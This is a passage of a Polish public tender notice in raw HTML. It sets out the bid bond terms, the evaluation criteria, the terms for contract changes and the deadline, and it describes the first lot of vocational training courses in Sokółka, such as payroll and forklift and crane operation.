podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;6.3.2.	w zakresie doświadczenia osób skierowanych przez Wykonawcę do realizacji zamówienia – wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich doświadczenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1)	formularz ofertowy (Załącznik nr 2 do SIWZ),2)	program szkoleń, zawierający opis co najmniej elementów wskazanych w szczegółowym opisie przedmiotu zamówienia stanowiącym Załącznik nr 1 do SIWZ, 3)	oświadczenie o spełnieniu warunków udziału w postępowaniu (Załącznik nr 3 do SIWZ),4)	oświadczenie o braku podstaw wykluczenia (Załącznik nr 4 do SIWZ),5)	zobowiązanie innego podmiotu (Załącznik nr 7 do SIWZ) – w przypadku, gdy Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów,6)	pełnomocnictwo (w formie oryginału lub poświadczonej notarialnie kopii) – w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zgodnie z art. 23 Pzp. Pełnomocnictwo powinno być udzielone przez osoby uprawnione do reprezentowania Wykonawcy; 7)	Dowód wniesienia wadium.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">10.1.	Zamawiający wymaga wniesienia wadium:1)	dla I części zamówienia w wysokości 2600,00 zł (słownie: dwa tysiące sześćset zł),2)	dla II części zamówienia w wysokości 8250,00 zł (słownie: osiem tysięcy dwieście pięćdziesiąt zł),10.2.	Wadium może być wnoszone w jednej lub kilku następujących formach:1) pieniądzu;2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;3) gwarancjach bankowych;4) gwarancjach ubezpieczeniowych;5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r. poz. 359 i 2260 oraz z 2017 r. poz. 1089).10.3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego nr: 28 1240 5211 1111 0010 8397 8776 prowadzony przez Bank Pekao S.A. W tytule przelewu należy wskazać: „Wadium – znak postępowania 35/KUR/PNM/RPOWP/2020 część …… zamówienia”. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.10.4.	Wadium wnosi się przed upływem terminu składania ofert. 10.5.	Za skutecznie wniesione wadium w pieniądzu Zamawiający uważa wadium, które w tym terminie znajdzie się na rachunku bankowym Zamawiającego.10.6.	Wadium wnoszone w formach, o których mowa w pkt 10.2 ppkt 2-5 SIWZ, należy złożyć w formie oryginału w siedzibie Zamawiającego.10.7.	Gwarancja (poręczenie) musi być podpisana przez upoważnionego przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji (poręczenia) winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 Pzp.10.8.	Dowód wniesienia wadium należy załączyć do oferty.10.9.	Zamawiający odrzuci ofertę, jeżeli wadium nie zostało wniesione lub zostało wniesione w sposób nieprawidłowy.10.10.	Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach wskazanych w art. 46 ust. 4a i ust. 5 Pzp.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin uruchomienia szkolenia (T)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena ofertowa (C)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>50,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zapewnienie (udostępnienie, użyczenia) urządzeń z dostępem do Internetu do nauki zdalnej (U)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>15,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie trenerów w pracy ze specyficznym uczestnikiem szkolenia (D)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Biuro obsługi uczestnika szkoleń (B)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>15,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">19.9.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku zajścia okoliczności w art. 144 ust. 1 pkt 2-6 Pzp oraz w przypadkach określonych we wzorze umowy na podstawie art. 144 ust. 1 pkt 1 Pzp, tj.1)	przedłużenia terminu wykonania zamówienia o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie terminu wykonania zamówienia, w następujących sytuacjach:	jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu wykonania zamówienia będą następstwem okoliczności, za które odpowiedzialności nie ponosi Wykonawca,	wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,	gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,	jeżeli wystąpi brak możliwości wykonywania określonych czynności w ramach przedmiotu zamówienia z powodu nie dopuszczania do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,	wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu zamówienia zgodnie z postanowieniami umowy. 2)	Strony dopuszczają możliwość zmiany umowy w przypadku ograniczenia zakresu przedmiotu umowy przy jednoczesnym zmniejszeniu wynagrodzenia Wykonawcy, jeżeli okaże się, że niektóre elementy przedmiotu umowy będą zbędne z punktu widzenia potrzeb Zamawiającego.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-08-11</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>I część zamówienia: przedmiotem zamówienia jest usługa realizacji szkoleń dla uczestników w zakresie szkoleń (Sokółka, powiat sokólski):</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I część zamówienia (Sokółka, powiat sokólski: 54 osoby): 1.1.	Kadry i płace (12 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie sokólskim•	Miejsce realizacji: Sokółka lub powiat sokólski•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 80•	Liczba uczestników: 8-12 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Prawo pracy i ubezpieczeń społecznych; Umowa o pracę i czynniki zmieniające; Wynagrodzenia i elementy składowe; Zaliczki na podatek dochodowy o Deklaracje ZUS; Wskaźniki wynagrodzeń.•	Egzamin: Szkolenie kończy się egzaminem potwierdzającym nabycie kwalifikacji, zgodnie z załącznikiem nr 8 Wytycznych Ministerstwa Rozwoju MR/2014- 2020/13(03) - słuchacz uzyska kwalifikacje do prowadzenia dokumentacji kadrowo-płacowej w firmie.1.2.	Obsługa wózków jezdniowych o napędzie silnikowym z wymianą butli gazowych w wóz-kach zasilanych gazem (8 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie sokólskim•	Miejsce realizacji: Sokółka lub powiat sokólski•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 35-40•	Liczba uczestników: 5-8 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Podstawy prawne dotyczące użytkowania wózków jezdniowych; Podział wóz-ków jezdniowych i ich parametry eksploatacyjne; Stateczność i zdolność udźwigowa wóz-ka podnośnikowego; Budowa układu jezdnego wózka; Mechanizmy podnoszenia wózka podnośnikowego i wymagania wobec ich elementów; Układ hydrauliczny wózka podno-śnikowego; Urządzenia zabezpieczające w wózkach jezdniowych; Czynności obsługowe przed rozpoczęciem pracy; Czynności obsługowe podczas pracy wózkiem jezdniowym i po jej zakończeniu; Praca wózkiem jezdniowym w warunkach szczególnych; Zasady eksploat-acji wózków jezdniowych zasilanych gazem - wymiana butli gazowych; Warunki bezpiecz-nej pracy i BHP przy obsłudze wózków; Procedury postępowania w przypadku nieszczę-śliwego zdarzenia, wypadku lub pożaru; Praktyczne czynności obsługowe i jazda wózkiem jezdniowym podnośnikowym •	Egzamin: Szkolenie kończy się egzaminem przed komisją UDT potwierdzającym nabycie kwalifikacji uprawniających do obsługi wózków jezdniowych zgodnie z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym oraz rozporządzeniem Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych oraz Kwalifikacyjną Komisją Energetyczną potwierdzającym nabycie kwalifikacji uprawniających do obsługi urządzeń i instalacji gazowych o ciśnieniu powyżej 5 kP1.3.	Obsługa suwnic (8 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie sokólskim•	Miejsce realizacji: Sokółka lub powiat sokólski•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 35-40•	Liczba uczestników: 5-8 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Ogólne wiadomości o dźwignicach; Wiadomości o dozorze technicznym; Ma-szynoznawstwo specjalistyczne; Eksploatacja; Bezpieczeństwo i higiena pracy; Zajęcia praktyczne•	Egzamin: Szkolenie kończy się egzaminem przed komisją UDT potwierdzającym nabycie kwalifikacji uprawniających do obsługi suwnic zgodnie z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym oraz rozporządzeniem Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okre-su ważności zaświadczeń kwalifikacyjnych1.4.	Operator przenośnych żurawi przeładunkowych HDS (6 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie sokólskim•	Miejsce realizacji: Sokółka lub powiat sokólski•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 35-40•	Liczba uczestników: 4-6 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Budowa i zasada działania żurawia przeładunkowego; Mechanizm żurawia przeładunkowego; Urządzenia zabezpieczające w żurawiach przeładunkowych; Liny i kry-teria ich oceny; Haki i kryteria oceny; Zawiesia; Czynności obsługowe przed rozpoczęciem pracy; Czynności obsługowe podczas pracy żurawiem przeładunkowym i po jej zakończe-niu; Praca żurawiem przeładunkowym w warunkach szczególnych; Warunki bezpiecznej pracy i BHP przy żurawiach przeładunkowych; Procedury postępowania w przypadku nie-szczęśliwego zdarzenia, wypadku lub pożaru; Praktyczne czynności obsługowe i ładunko-we•	Egzamin: Szkolenie kończy się egzaminem przed komisją UDT potwierdzającym nabycie kwalifikacji uprawniających do obsługi przenośnych żurawi przeładunkowych HDS zgod-nie z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym oraz rozporządzeniem Mini-stra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych1.5.	Instalacje elektroenergetyczne oraz urządzenia napędowe i oświetlenia elektrycznego o napięciu do 1 kV – obsługa, konserwacja (8 osób)•	Grupa docelowa: osoby 